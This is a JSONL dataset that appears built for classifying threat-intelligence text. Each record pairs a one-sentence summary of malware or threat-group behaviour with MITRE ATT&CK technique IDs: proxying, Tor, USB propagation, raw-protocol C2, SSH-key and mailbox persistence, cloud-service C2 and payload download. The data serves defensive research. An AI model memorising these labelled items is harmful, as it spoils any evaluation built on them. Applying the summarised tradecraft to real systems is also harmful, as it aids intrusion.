{"text1":"APT28 used other victims as proxies to relay command traffic, for instance using a compromised Georgian military email server as a hop point to NATO victims. The group has also used a tool that acts as a proxy to allow C2 even if the victim is behind a router. APT28 has also used a machine to relay and obscure communications between CHOPSTICK and their server.","labels":"['T1090.002']"}
{"text1":"An APT3 downloader establishes SOCKS5 connections for its initial C2.","labels":"['T1090.002', 'T1095']"}
{"text1":"FIN5 maintains access to victim environments by using FLIPSIDE to create a proxy for a backup RDP tunnel.","labels":"['T1090.002']"}
{"text1":"GALLIUM used a modified version of HTRAN to redirect connections between networks.","labels":"['T1090.002']"}
{"text1":"Lazarus Group has used multiple proxies to obfuscate network traffic from victims.","labels":"['T1090.002']"}
{"text1":"MuddyWater has controlled POWERSTATS from behind a proxy network to obfuscate the C2 location. MuddyWater has used a series of compromised websites that victims connected to randomly to relay information to command and control (C2).","labels":"['T1090.002']"}
{"text1":"Mythic can leverage a modified SOCKS5 proxy to tunnel egress C2 traffic.","labels":"['T1090.002']"}
{"text1":"Okrum can identify proxy servers configured and used by the victim, and use it to make HTTP requests to C2 its server.","labels":"['T1090.002']"}
{"text1":"POWERSTATS has connected to C2 servers through proxies.","labels":"['T1090.002']"}
{"text1":"QakBot has a module that can proxy C2 communications.","labels":"['T1090.002']"}
{"text1":"Silence has used ProxyBot, which allows the attacker to redirect traffic from the current node to the backconnect server via Sock4\\Socks5.","labels":"['T1090.002']"}
{"text1":"The Winnti for Windows HTTP\/S C2 mode can make use of an external proxy.","labels":"['T1090.002']"}
{"text1":"Tonto Team has routed their traffic through an external server in order to obfuscate their location.","labels":"['T1090.002']"}
{"text1":"TrickBot has been known to reach a command and control server via one of nine proxy IP addresses.","labels":"['T1090.002']"}
{"text1":"menuPass has used a global service provider's IP as a proxy for C2 traffic from a victim.","labels":"['T1090.002']"}
{"text1":"A backdoor used by APT29 created a Tor hidden service to forward traffic from the Tor client to local ports 3389 (RDP), 139 (Netbios), and 445 (SMB) enabling full remote access from outside the network and has also used TOR.","labels":"['T1090.003']"}
{"text1":"APT28 has routed traffic over Tor and VPN servers to obfuscate their activities.","labels":"['T1090.003']"}
{"text1":"CostaRicto has used a layer of proxies to manage C2 communications.","labels":"['T1090.003']"}
{"text1":"Cyclops Blink has used Tor nodes for C2 traffic.","labels":"['T1090.003']"}
{"text1":"Dok downloads and installs Tor via homebrew.","labels":"['T1090.003']"}
{"text1":"Dridex can use multiple layers of proxy servers to hide terminal nodes in its infrastructure.","labels":"['T1090.003']"}
{"text1":"During Operation Wocao, threat actors executed commands through the installed web shell via Tor exit nodes.","labels":"['T1090.003']"}
{"text1":"FIN4 has used Tor to log in to victims' email accounts.","labels":"['T1090.003']"}
{"text1":"GreyEnergy has used Tor relays for Command and Control servers.","labels":"['T1090.003']"}
{"text1":"Inception used chains of compromised routers to proxy C2 communications between them and cloud service providers.","labels":"['T1090.003']"}
{"text1":"Industroyer used Tor nodes for C2.","labels":"['T1090.003']"}
{"text1":"MacSpy uses Tor for command and control.","labels":"['T1090.003']"}
{"text1":"Operation Wocao has executed commands through the installed web shell via Tor exit nodes.","labels":"['T1090.003']"}
{"text1":"StrongPity can use multiple layers of proxy servers to hide terminal nodes in its infrastructure.","labels":"['T1090.003']"}
{"text1":"Traffic traversing the Tor network will be forwarded to multiple nodes before exiting the Tor network and continuing on to its intended destination.","labels":"['T1090.003']"}
{"text1":"Ursnif has used Tor for C2.","labels":"['T1090.003']"}
{"text1":"WannaCry uses Tor for command and control traffic.","labels":"['T1090.003']"}
{"text1":"APT29 has used the meek domain fronting plugin for Tor to hide the destination of C2 traffic.","labels":"['T1090.004']"}
{"text1":"Cobalt Strike has the ability to accept a value for HTTP Host Header to enable domain fronting.","labels":"['T1090.004']"}
{"text1":"SMOKEDHAM has used a fronted domain to obfuscate its hard-coded C2 server domain.","labels":"['T1090.004']"}
{"text1":"APT28 uses a tool to infect connected USB devices and transmit itself to air-gapped computers when the infected USB device is inserted.","labels":"['T1091']"}
{"text1":"APT30 may have used the SHIPSHAPE malware to move onto air-gapped networks. SHIPSHAPE targets removable drives to spread to other systems by modifying the drive to use Autorun to execute or by hiding legitimate document files and copying an executable to the folder with the same name as the legitimate document.","labels":"['T1091']"}
{"text1":"Agent.btz drops itself onto removable media devices and creates an autorun.inf file with an instruction to run that file. When the device is inserted into another system, it opens autorun.inf and loads the malware.","labels":"['T1091']"}
{"text1":"Conficker variants used the Windows AUTORUN feature to spread through USB propagation.","labels":"['T1091']"}
{"text1":"Crimson can spread across systems by infecting removable media.","labels":"['T1091']"}
{"text1":"Darkhotel's selective infector modifies executables stored on removable media as a method of spreading across computers.","labels":"['T1091']"}
{"text1":"DustySky searches for removable media and duplicates itself onto it.","labels":"['T1091']"}
{"text1":"FIN7 actors have mailed USB drives to potential victims containing malware that downloads and installs various backdoors, including in some cases for ransomware operations.","labels":"['T1091']"}
{"text1":"Flame contains modules to infect USB sticks and spread laterally to other Windows systems the stick is plugged into using Autorun functionality.","labels":"['T1091']"}
{"text1":"H1N1 has functionality to copy itself to removable media.","labels":"['T1091']"}
{"text1":"Mustang Panda has used a customized PlugX variant which could spread through USB connections.","labels":"['T1091']"}
{"text1":"Ramsay can spread itself by infecting other portable executable files on removable drives.","labels":"['T1091']"}
{"text1":"Stuxnet can propagate via removable media using an autorun.inf file or the CVE-2010-2568 LNK vulnerability.","labels":"['T1091']"}
{"text1":"USBStealer drops itself onto removable media and relies on Autorun to execute the malicious file when a user opens the removable media on another system.","labels":"['T1091']"}
{"text1":"USBferry can copy its installer to attached USB storage devices.","labels":"['T1091']"}
{"text1":"Ursnif has copied itself to and infected removable drives for propagation.","labels":"['T1091']"}
{"text1":"njRAT can be configured to spread via removable drives.","labels":"['T1091']"}
{"text1":"USBStealer drops commands for a second victim onto a removable media drive inserted into the first victim, and commands are executed when the drive is inserted into the second victim.","labels":"['T1092']"}
{"text1":"Anchor has used ICMP in C2 communications.","labels":"['T1095']"}
{"text1":"Aria-body has used TCP in C2 communications.","labels":"['T1095']"}
{"text1":"AuTo Stealer can use TCP to communicate with command and control servers.","labels":"['T1095']"}
{"text1":"BITTER has used TCP for C2 communications.","labels":"['T1095']"}
{"text1":"BUBBLEWRAP can communicate using SOCKS.","labels":"['T1095']"}
{"text1":"BackdoorDiplomacy has used EarthWorm for network tunneling with a SOCKS5 server and port transfer functionalities.","labels":"['T1095']"}
{"text1":"Bandook has a command built in to use a raw TCP socket.","labels":"['T1095']"}
{"text1":"Carbon uses TCP and UDP for C2.","labels":"['T1095']"}
{"text1":"Cobalt Strike can be configured to use TCP, ICMP, and UDP for C2 communications.","labels":"['T1095']"}
{"text1":"Cryptoistic can use TCP in communications with C2.","labels":"['T1095']"}
{"text1":"Derusbi binds to a raw socket on a random source port between 31800 and 31900 for C2.","labels":"['T1095']"}
{"text1":"Drovorub can use TCP to communicate between its agent and client modules.","labels":"['T1095']"}
{"text1":"FIN6 has used Metasploit Bind and Reverse TCP stagers.","labels":"['T1095']"}
{"text1":"FunnyDream can communicate with C2 over TCP and UDP.","labels":"['T1095']"}
{"text1":"Gelsemium has the ability to use TCP and UDP in C2 communications.","labels":"['T1095']"}
{"text1":"HAFNIUM has used TCP for C2.","labels":"['T1095']"}
{"text1":"If NETEAGLE does not detect a proxy configured on the infected machine, it will send beacons via UDP\/6000. Also, after retrieving a C2 IP address and Port Number, NETEAGLE will initiate a TCP connection to this socket. The ensuing connection is a plaintext C2 channel in which commands are specified by DWORDs.","labels":"['T1095']"}
{"text1":"LookBack uses a custom binary protocol over sockets for C2 communications.","labels":"['T1095']"}
{"text1":"MacMa has used a custom JSON-based protocol for its C&C communications.","labels":"['T1095']"}
{"text1":"Metamorfo has used raw TCP for C2.","labels":"['T1095']"}
{"text1":"Mis-Type network traffic can communicate over a raw socket.","labels":"['T1095']"}
{"text1":"MoonWind completes network communication via raw sockets.","labels":"['T1095']"}
{"text1":"Mythic supports WebSocket and TCP-based C2 profiles.","labels":"['T1095']"}
{"text1":"NETWIRE can use TCP in C2 communications.","labels":"['T1095']"}
{"text1":"Nebulae can use TCP in C2 communications.","labels":"['T1095']"}
{"text1":"PLATINUM has used the Intel\u00ae Active Management Technology (AMT) Serial-over-LAN (SOL) channel for command and control.","labels":"['T1095']"}
{"text1":"Pay2Key has sent its public key to the C2 server over TCP.","labels":"['T1095']"}
{"text1":"PingPull variants have the ability to communicate with C2 servers using ICMP or TCP.","labels":"['T1095']"}
{"text1":"QuasarRAT can use TCP for C2 communication.","labels":"['T1095']"}
{"text1":"RCSession has the ability to use TCP and UDP in C2 communications.","labels":"['T1095']"}
{"text1":"RainyDay can use TCP in C2 communications.","labels":"['T1095']"}
{"text1":"Remsec is capable of using ICMP, TCP, and UDP for C2.","labels":"['T1095']"}
{"text1":"SDBbot has the ability to communicate with C2 with TCP over port 443.","labels":"['T1095']"}
{"text1":"SombRAT has the ability to use TCP sockets to send data and ICMP to ping the C2 server.","labels":"['T1095']"}
{"text1":"Some Reaver variants use raw TCP for C2.","labels":"['T1095']"}
{"text1":"Some variants of FakeM use SSL to communicate with C2 servers.","labels":"['T1095']"}
{"text1":"TSCookie can use ICMP to receive information on the destination server.","labels":"['T1095']"}
{"text1":"Taidoor can use TCP for C2 communications.","labels":"['T1095']"}
{"text1":"WINDSHIELD C2 traffic can communicate via TCP raw sockets.","labels":"['T1095']"}
{"text1":"Winnti for Linux has used ICMP, custom TCP, and UDP in outbound communications.","labels":"['T1095']"}
{"text1":"Winnti for Windows can communicate using custom TCP.","labels":"['T1095']"}
{"text1":"gh0st RAT has used an encrypted protocol within TCP segments to communicate with the C2.","labels":"['T1095']"}
{"text1":"APT3 has been known to add created accounts to local admin groups to maintain elevated access.","labels":"['T1098']"}
{"text1":"Kimsuky has added accounts to specific groups with \"net localgroup\".","labels":"['T1098']"}
{"text1":"Lazarus Group malware WhiskeyDelta-Two contains a function that attempts to rename the administrator\u2019s account.","labels":"['T1098']"}
{"text1":"Magic Hound granted compromised email accounts read access to the email boxes of additional targeted accounts. The group then was able to authenticate to the intended victim's OWA (Outlook Web Access) portal and read hundreds of email communications for information on Middle East organizations.","labels":"['T1098', 'T1098.002']"}
{"text1":"Sandworm Team used the \"sp_addlinkedsrvlogin\" command in MS-SQL to create a link between a created account and other servers in the network.","labels":"['T1098']"}
{"text1":"The Mimikatz credential dumper has been extended to include Skeleton Key domain controller authentication bypass functionality. The \"LSADUMP::ChangeNTLM\" and \"LSADUMP::SetNTLM\" modules can also manipulate the password hash of an account without knowing the clear text value.","labels":"['T1098']"}
{"text1":"APT29 has added credentials to OAuth Applications and Service Principals.","labels":"['T1098.001']"}
{"text1":"UNC2452 added credentials to OAuth Applications and Service Principals.","labels":"['T1098.001']"}
{"text1":"APT28 has used a Powershell cmdlet to grant the \"ApplicationImpersonation\" role to a compromised account.","labels":"['T1098.002']"}
{"text1":"APT29 added their own devices as allowed IDs for active sync using \"Set-CASMailbox\", allowing it to obtain copies of victim mailboxes. It also added additional permissions (such as Mail.Read and Mail.ReadWrite) to compromised Application or Service Principals.","labels":"['T1098.002']"}
{"text1":"UNC2452 added their own devices as allowed IDs for active sync using \"Set-CASMailbox\", allowing it to obtain copies of victim mailboxes. It also added additional permissions (such as Mail.Read and Mail.ReadWrite) to compromised Application or Service Principals.","labels":"['T1098.002']"}
{"text1":"APT29 has granted `company administrator` privileges to a newly created service principal.","labels":"['T1098.003']"}
{"text1":"Bundlore creates a new key pair with \"ssh-keygen\" and drops the newly created user key in \"authorized_keys\" to enable remote login.","labels":"['T1098.004']"}
{"text1":"Earth Lusca has dropped an SSH-authorized key in the `\/root\/.ssh` folder in order to access a compromised server with SSH.","labels":"['T1098.004']"}
{"text1":"Skidmap has the ability to add the public key of its handlers to the \"authorized_keys\" file to maintain persistence on an infected host.","labels":"['T1098.004']"}
{"text1":"TeamTNT has added RSA keys in \"authorized_keys\".","labels":"['T1098.004']"}
{"text1":"XCSSET will create an ssh key if necessary with the \"ssh-keygen -t rsa -f $HOME\/.ssh\/id_rsa -P\" command. XCSSET will upload a private key file to the server to remotely access the host without a password.","labels":"['T1098.004']"}
{"text1":"AADInternals can register a device to Azure AD.","labels":"['T1098.005']"}
{"text1":"APT29 registered devices in order to enable mailbox syncing via the \"Set-CASMailbox\" command.","labels":"['T1098.005']"}
{"text1":"APT32 has used Dropbox, Amazon S3, and Google Drive to host malicious downloads.","labels":"['T1102']"}
{"text1":"Bazar downloads have been hosted on Google Docs.","labels":"['T1102']"}
{"text1":"BoomBox can download files from Dropbox using a hardcoded access token.","labels":"['T1102']"}
{"text1":"Bumblebee has been downloaded to victim's machines from OneDrive.","labels":"['T1102']"}
{"text1":"Chimera has used Google Cloud's appspot service to host C2 servers.","labels":"['T1102']"}
{"text1":"Doki has used the dogechain.info API to generate a C2 address.","labels":"['T1102']"}
{"text1":"During Operation Spalax, the threat actors used OneDrive and MediaFire to host payloads.","labels":"['T1102']"}
{"text1":"EXOTIC LILY has used file-sharing services including WeTransfer, TransferNow, and OneDrive to deliver payloads.","labels":"['T1102']"}
{"text1":"Ember Bear has used Discord's content delivery network (CDN) to deliver malware and malicious scripts to a compromised host.","labels":"['T1102']"}
{"text1":"FIN6 has used Pastebin and Google Storage to host content for their operations.","labels":"['T1102']"}
{"text1":"FIN8 has used \"sslip.io\", a free IP to domain mapping service that also makes SSL certificate generation easier for traffic encryption, as part of their command and control.","labels":"['T1102']"}
{"text1":"Gamaredon Group has used GitHub repositories for downloaders which will be obtained by the group's .NET executable on the compromised system.","labels":"['T1102']"}
{"text1":"Inception has incorporated at least five different cloud service providers into their C2 infrastructure including CloudMe.","labels":"['T1102']"}
{"text1":"LazyScripter has used GitHub to host its payloads to operate spam campaigns.","labels":"['T1102']"}
{"text1":"Mustang Panda has used DropBox URLs to deliver variants of PlugX.","labels":"['T1102']"}
{"text1":"NETWIRE has used web services including Paste.ee to host payloads.","labels":"['T1102']"}
{"text1":"SMOKEDHAM has used Google Drive and Dropbox to host files downloaded by victims via malicious links.","labels":"['T1102']"}
{"text1":"SharpStage has used a legitimate web service for evading detection.","labels":"['T1102']"}
{"text1":"TeamTNT has leveraged iplogger.org to send collected data back to C2.","labels":"['T1102']"}
{"text1":"Turla has used legitimate web services including Pastebin, Dropbox, and GitHub for C2 communications.","labels":"['T1102']"}
{"text1":"WhisperGate can download additional payloads hosted on a Discord channel.","labels":"['T1102']"}
{"text1":"Astaroth can store C2 information on cloud hosting services such as AWS and CloudFlare and websites like YouTube and Facebook.","labels":"['T1102.001']"}
{"text1":"BLACKCOFFEE uses Microsoft\u2019s TechNet Web portal to obtain a dead drop resolver containing an encoded tag with the IP address of a command and control server.","labels":"['T1102.001']"}
{"text1":"CharmPower can retrieve C2 domain information from actor-controlled S3 buckets.","labels":"['T1102.001']"}
{"text1":"Javali can read C2 information from Google Documents and YouTube.","labels":"['T1102.001']"}
{"text1":"Patchwork hides base64-encoded and encrypted C2 server locations in comments on legitimate websites.","labels":"['T1102.001']"}
{"text1":"PlugX uses Pastebin to store C2 addresses.","labels":"['T1102.001']"}
{"text1":"PolyglotDuke can use Twitter, Reddit, Imgur and other websites to get a C2 URL.","labels":"['T1102.001']"}
{"text1":"RTM has used an RSS feed on Livejournal to update a list of encrypted C2 server names.","labels":"['T1102.001']"}
{"text1":"RTM has used an RSS feed on Livejournal to update a list of encrypted C2 server names. RTM has also hidden Pony C2 server IP addresses within transactions on the Bitcoin and Namecoin blockchain.","labels":"['T1102.001']"}
{"text1":"Some MiniDuke components use Twitter to initially obtain the address of a C2 server or as a backup if no hard-coded C2 server responds.","labels":"['T1102.001']"}
{"text1":"Xbash can obtain a webpage hosted on Pastebin to update its C2 domain list.","labels":"['T1102.001']"}
{"text1":"A Turla JavaScript backdoor has used Google Apps Script as its C2 server.","labels":"['T1102.002']"}
{"text1":"APT12 has used blogs and WordPress for C2 infrastructure.","labels":"['T1102.002']"}
{"text1":"APT28 has used Google Drive for C2.","labels":"['T1102.002']"}
{"text1":"APT29 has used social media platforms to hide communications to C2 servers.","labels":"['T1102.002']"}
{"text1":"APT39 has communicated with C2 through files uploaded to and downloaded from DropBox.","labels":"['T1102.002']"}
{"text1":"BLUELIGHT can use different cloud providers for its C2.","labels":"['T1102.002']"}
{"text1":"BoxCaon has used DropBox for C2 communications.","labels":"['T1102.002']"}
{"text1":"Carbanak has used a VBScript named \"ggldr\" that uses Google Apps Script, Sheets, and Forms services for C2.","labels":"['T1102.002']"}
{"text1":"ComRAT has the ability to use the Gmail web UI to receive commands and exfiltrate information.","labels":"['T1102.002']"}
{"text1":"Comnie uses blogs and third-party sites (GitHub, tumbler, and BlogSpot) to avoid DNS-based blocking of their communication to the command and control server.","labels":"['T1102.002']"}
{"text1":"CreepyDrive can use OneDrive for C2.","labels":"['T1102.002']"}
{"text1":"Crutch can use Dropbox to receive commands and upload stolen data.","labels":"['T1102.002']"}
{"text1":"DOGCALL is capable of leveraging cloud storage APIs such as Cloud, Box, Dropbox, and Yandex for C2.","labels":"['T1102.002']"}
{"text1":"Empire can use Dropbox and GitHub for C2.","labels":"['T1102.002']"}
{"text1":"FIN7 used legitimate services like Google Docs, Google Scripts, and Pastebin for C2.","labels":"['T1102.002']"}
{"text1":"Grandoreiro can utilize web services including Google sites to send and receive C2 data.","labels":"['T1102.002']"}
{"text1":"HEXANE has used cloud services, including OneDrive, for C2.","labels":"['T1102.002']"}
{"text1":"KARAE can use public cloud-based storage providers for command and control.","labels":"['T1102.002']"}
{"text1":"Kazuar has used compromised WordPress blogs as C2 servers.","labels":"['T1102.002']"}
{"text1":"LOWBALL uses the Dropbox cloud storage service for command and control.","labels":"['T1102.002']"}
{"text1":"Lazarus Group has used GitHub as C2, pulling hosted image payloads then committing command execution output to files in specific directories.","labels":"['T1102.002']"}
{"text1":"MuddyWater has used web services including OneHub to distribute remote access tools.","labels":"['T1102.002']"}
{"text1":"One variant of CloudDuke uses a Microsoft OneDrive account to exchange commands and stolen data with its operators.","labels":"['T1102.002']"}
{"text1":"Orz has used Technet and Pastebin web pages for command and control.","labels":"['T1102.002']"}
{"text1":"POORAIM has used AOL Instant Messenger for C2.","labels":"['T1102.002']"}
{"text1":"RogueRobin has used Google Drive as a Command and Control channel.","labels":"['T1102.002']"}
{"text1":"SLOWDRIFT uses cloud based services for C2.","labels":"['T1102.002']"}
{"text1":"Sandworm Team has used the Telegram Bot API from Telegram Messenger to send and receive commands to its Python backdoor. Sandworm Team also used legitimate M.E.Doc software update check requests for sending and receiving commands and hosted malicious payloads on putdrive.com.","labels":"['T1102.002']"}
{"text1":"The CALENDAR malware communicates through the use of events in Google Calendar.","labels":"['T1102.002']"}
{"text1":"UBoatRAT has used GitHub and a public blog service in Hong Kong for C2 communications.","labels":"['T1102.002']"}
{"text1":"ZIRCONIUM has used Dropbox for C2 allowing upload and download of files as well as execution of arbitrary commands.","labels":"['T1102.002']"}
{"text1":"yty communicates to the C2 server by retrieving a Google Doc.","labels":"['T1102.002']"}
{"text1":"EVILNUM has used a one-way communication method via GitLab and Digital Point to perform C2.","labels":"['T1102.003']"}
{"text1":"Leviathan has received C2 instructions from user profiles created on legitimate websites such as Github and TechNet.","labels":"['T1102.003']"}
{"text1":"Metamorfo has downloaded a zip file for execution on the system.","labels":"['T1102.003']"}
{"text1":"OnionDuke uses Twitter as a backup C2.","labels":"['T1102.003']"}
{"text1":"The \"tDiscoverer\" variant of HAMMERTOSS establishes a C2 channel by downloading resources from Web services like Twitter and GitHub. HAMMERTOSS binaries contain an algorithm that generates a different Twitter handle for the malware to check for instructions every day.","labels":"['T1102.003']"}
{"text1":"APT41 used the storescyncsvc.dll BEACON backdoor to download a secondary backdoor.","labels":"['T1104']"}
{"text1":"BACKSPACE attempts to avoid detection by checking a first stage command and control server to determine if it should connect to the second stage server, which performs \"louder\" interactions with the malware.","labels":"['T1104']"}
{"text1":"BLACKCOFFEE uses Microsoft\u2019s TechNet Web portal to obtain an encoded tag containing the IP address of a command and control server and then communicates separately with that IP address for C2. If the C2 server is discovered or shut down, the threat actors can update the encoded IP address on TechNet to maintain control of the victims\u2019 machines.","labels":"['T1104']"}
{"text1":"Lazarus Group has used multi-stage malware components that inject later stages into separate processes.","labels":"['T1104']"}
{"text1":"MuddyWater has used one C2 to obtain enumeration scripts and monitor web logs, but a different C2 to send data back.","labels":"['T1104']"}
{"text1":"The Bazar loader is used to download and execute the Bazar backdoor.","labels":"['T1104']"}
{"text1":"Valak can download additional modules and malware capable of using separate C2 channels.","labels":"['T1104']"}
{"text1":"APT29 has downloaded additional tools, such as TEARDROP malware and Cobalt Strike, to a compromised host following initial access.","labels":"['T1105']"}
{"text1":"APT33 has downloaded additional files and programs from its C2 server.","labels":"['T1105']"}
{"text1":"APT34 can download remote files onto victims.","labels":"['T1105']"}
{"text1":"APT37 has downloaded second stage malware from compromised websites.","labels":"['T1105']"}
{"text1":"APT38 used a backdoor, NESTEGG, that has the capability to download and upload files to and from a victim\u2019s machine.","labels":"['T1105']"}
{"text1":"APT39 has downloaded tools to compromised hosts.","labels":"['T1105']"}
{"text1":"Action RAT has the ability to download additional payloads onto an infected machine.","labels":"['T1105']"}
{"text1":"Agent.btz attempts to download an encrypted binary from a specified domain.","labels":"['T1105']"}
{"text1":"Ajax Security Team has used Wrapper\/Gholee, custom-developed malware, which downloaded additional malware to the infected system.","labels":"['T1105']"}
{"text1":"Andariel has downloaded additional tools and malware onto compromised hosts.","labels":"['T1105']"}
{"text1":"Aria-body has the ability to download additional payloads from C2.","labels":"['T1105']"}
{"text1":"Astaroth uses certutil and BITSAdmin to download additional malware.","labels":"['T1105']"}
{"text1":"Attor can download additional plugins, updates and other files.","labels":"['T1105']"}
{"text1":"AuditCred can download files and additional malware.","labels":"['T1105']"}
{"text1":"BADFLICK has download files from its C2 server.","labels":"['T1105']"}
{"text1":"BADNEWS is capable of downloading additional files through C2 channels, including a new version of itself.","labels":"['T1105']"}
{"text1":"BBK has the ability to download files from C2 to the infected host.","labels":"['T1105']"}
{"text1":"BISCUIT has a command to download a file from the C2 server.","labels":"['T1105']"}
{"text1":"BITSAdmin can be used to create BITS Jobs to upload and\/or download files.","labels":"['T1105']"}
{"text1":"BITTER has downloaded additional malware and tools onto a compromised host.","labels":"['T1105']"}
{"text1":"BLINDINGCAN has downloaded files to a victim machine.","labels":"['T1105']"}
{"text1":"BLUELIGHT can download additional files onto the host.","labels":"['T1105']"}
{"text1":"BONDUPDATER can download or upload files from its C2 server.","labels":"['T1105']"}
{"text1":"BRONZE BUTLER has used various tools to download files, including DGet (a similar tool to wget).","labels":"['T1105']"}
{"text1":"Backdoor.Oldrea can download additional modules from C2.","labels":"['T1105']"}
{"text1":"BackdoorDiplomacy has downloaded additional files and tools onto a compromised host.","labels":"['T1105']"}
{"text1":"BadPatch can download and execute or update malware.","labels":"['T1105']"}
{"text1":"Bankshot uploads files and secondary payloads to the victim's machine.","labels":"['T1105']"}
{"text1":"Bazar can download and deploy additional payloads, including ransomware and post-exploitation frameworks such as Cobalt Strike.","labels":"['T1105']"}
{"text1":"BendyBear is designed to download an implant from a C2 server.","labels":"['T1105']"}
{"text1":"Bisonal has the capability to download files to execute on the victim\u2019s machine.","labels":"['T1105']"}
{"text1":"BlackMould has the ability to download files to the victim's machine.","labels":"['T1105']"}
{"text1":"BoomBox has the ability to download next stage malware components to a compromised system.","labels":"['T1105']"}
{"text1":"BoxCaon can download files.","labels":"['T1105']"}
{"text1":"Briba downloads files onto infected hosts.","labels":"['T1105']"}
{"text1":"Bumblebee can download and execute additional payloads including through the use of a `Dex` command.","labels":"['T1105']"}
{"text1":"CARROTBALL has the ability to download and install a remote payload.","labels":"['T1105']"}
{"text1":"CHOPSTICK is capable of performing remote file transmission.","labels":"['T1105']"}
{"text1":"CORESHELL downloads another dropper from its C2 server.","labels":"['T1105']"}
{"text1":"CSPY Downloader can download additional tools to a compromised host.","labels":"['T1105']"}
{"text1":"Calisto has the capability to upload and download files to the victim's machine.","labels":"['T1105']"}
{"text1":"CallMe has the capability to download a file to the victim from the C2 server.","labels":"['T1105']"}
{"text1":"Cannon can download a payload for execution.","labels":"['T1105']"}
{"text1":"Carberp can download and execute new plugins from the C2 server.","labels":"['T1105']"}
{"text1":"Caterpillar WebShell has a module to download and upload files to the system.","labels":"['T1105']"}
{"text1":"ChChes is capable of downloading files, including additional modules.","labels":"['T1105']"}
{"text1":"Chaes can download additional files onto an infected machine.","labels":"['T1105']"}
{"text1":"Chimera has remotely copied tools and malware onto targeted systems.","labels":"['T1105']"}
{"text1":"China Chopper's server component can download remote files.","labels":"['T1105']"}
{"text1":"Chrommme can download its code from C2.","labels":"['T1105']"}
{"text1":"Cobalt Group has used public sites such as github.com and sendspace.com to upload files and then download them to victim computers. The group's JavaScript backdoor is also capable of downloading files.","labels":"['T1105']"}
{"text1":"Conficker downloads an HTTP server to the infected machine.","labels":"['T1105']"}
{"text1":"Confucius has downloaded additional files and payloads onto a compromised host following initial access.","labels":"['T1105']"}
{"text1":"CookieMiner can download additional scripts from a web server.","labels":"['T1105']"}
{"text1":"CostaBricks can download additional payloads onto a compromised host.","labels":"['T1105']"}
{"text1":"CostaBricks has been used to load SombRAT onto a compromised host.","labels":"['T1105']"}
{"text1":"CreepyDrive can download files to the compromised host.","labels":"['T1105']"}
{"text1":"Cryptoistic has the ability to send and receive files.","labels":"['T1105']"}
{"text1":"Cuba can download files from its C2 server.","labels":"['T1105']"}
{"text1":"Cyclops Blink has the ability to download files to target systems.","labels":"['T1105']"}
{"text1":"DDKONG downloads and uploads files on the victim\u2019s machine.","labels":"['T1105']"}
{"text1":"DOGCALL can download and execute additional payloads.","labels":"['T1105']"}
{"text1":"Dacls can download its payload from a C2 server.","labels":"['T1105']"}
{"text1":"DanBot can download additional files to a targeted system.","labels":"['T1105']"}
{"text1":"DarkComet can load any files onto the infected machine to execute.","labels":"['T1105']"}
{"text1":"Darkhotel has used first-stage payloads that download additional malware from C2 servers.","labels":"['T1105']"}
{"text1":"Diavol can receive configuration updates and additional payloads including wscpy.exe from C2.","labels":"['T1105']"}
{"text1":"DnsSystem can download files to compromised systems after receiving a command with the string `downloaddd`.","labels":"['T1105']"}
{"text1":"Doki has downloaded scripts from C2.","labels":"['T1105']"}
{"text1":"Donut can download and execute previously staged shellcode payloads.","labels":"['T1105']"}
{"text1":"Dragonfly downloaded tools from a remote server after they were inside the victim network.","labels":"['T1105']"}
{"text1":"Dragonfly has copied and installed tools for operations once in the victim environment.","labels":"['T1105']"}
{"text1":"DropBook can download and execute additional files.","labels":"['T1105']"}
{"text1":"Drovorub can download files to a compromised host.","labels":"['T1105']"}
{"text1":"Dtrack\u2019s can download and upload a file to the victim\u2019s computer.","labels":"['T1105']"}
{"text1":"During C0015, the threat actors downloaded additional tools and files onto a compromised network.","labels":"['T1105']"}
{"text1":"During CostaRicto, the threat actors downloaded malware and tools onto a compromised host.","labels":"['T1105']"}
{"text1":"During Frankenstein, the threat actors downloaded files and tools onto a victim machine.","labels":"['T1105']"}
{"text1":"During Operation Sharpshooter, additional payloads were downloaded after a target was infected with a first-stage downloader.","labels":"['T1105']"}
{"text1":"Dyre has a command to download and executes additional files.","labels":"['T1105']"}
{"text1":"Egregor has the ability to download files from its C2 server.","labels":"['T1105']"}
{"text1":"Ember Bear has used tools to download malicious code.","labels":"['T1105']"}
{"text1":"Emissary has the capability to download files from the C2 server.","labels":"['T1105']"}
{"text1":"Empire can upload and download to and from a victim machine.","labels":"['T1105']"}
{"text1":"EvilBunny has downloaded additional Lua scripts from the C2.","labels":"['T1105']"}
{"text1":"Evilnum can deploy additional components or tools as needed.","labels":"['T1105']"}
{"text1":"Exaramel for Linux has a command to download a file from  and to a remote C2 server.","labels":"['T1105']"}
{"text1":"Exaramel has a command to download a file from a remote server to execute.","labels":"['T1105']"}
{"text1":"Explosive has a function to download a file to the infected system.","labels":"['T1105']"}
{"text1":"FIN7 has downloaded additional malware to execute on the victim's machine, including by using a PowerShell script to launch shellcode that retrieves an additional payload.","labels":"['T1105']"}
{"text1":"FIN8 has used remote code execution to download subsequent payloads.","labels":"['T1105']"}
{"text1":"FYAnti can download additional payloads to a compromised host.","labels":"['T1105']"}
{"text1":"Felismus can download files from remote servers.","labels":"['T1105']"}
{"text1":"Flagpro can download additional malware from the C2 server.","labels":"['T1105']"}
{"text1":"Frankenstein has uploaded and downloaded files to utilize additional plugins.","labels":"['T1105']"}
{"text1":"FunnyDream can download additional files onto a compromised host.","labels":"['T1105']"}
{"text1":"GALLIUM dropped additional tools to victims during their operation, including portqry.exe, a renamed cmd.exe file, winrar, and HTRAN.","labels":"['T1105']"}
{"text1":"Gamaredon Group has downloaded additional malware and tools onto a compromised host.","labels":"['T1105']"}
{"text1":"Gazer can execute a task to download a file.","labels":"['T1105']"}
{"text1":"Gelsemium can download additional plug-ins to a compromised host.","labels":"['T1105']"}
{"text1":"Gold Dragon can download additional components from the C2 server.","labels":"['T1105']"}
{"text1":"GoldMax can download and execute additional files.","labels":"['T1105']"}
{"text1":"GoldenSpy constantly attempts to download and execute files from the remote C2, including GoldenSpy itself if not found on the system.","labels":"['T1105']"}
{"text1":"Gorgon Group malware can download additional files from C2 servers.","labels":"['T1105']"}
{"text1":"Grandoreiro can download its second stage from a hardcoded URL within the loader's code.","labels":"['T1105']"}
{"text1":"GreyEnergy can download additional modules and payloads.","labels":"['T1105']"}
{"text1":"GrimAgent has the ability to download and execute additional payloads.","labels":"['T1105']"}
{"text1":"GuLoader can download further malware for execution on the victim's machine.","labels":"['T1105']"}
{"text1":"H1N1 contains a command to download and execute a file from a remotely hosted URL using WinINet HTTP requests.","labels":"['T1105']"}
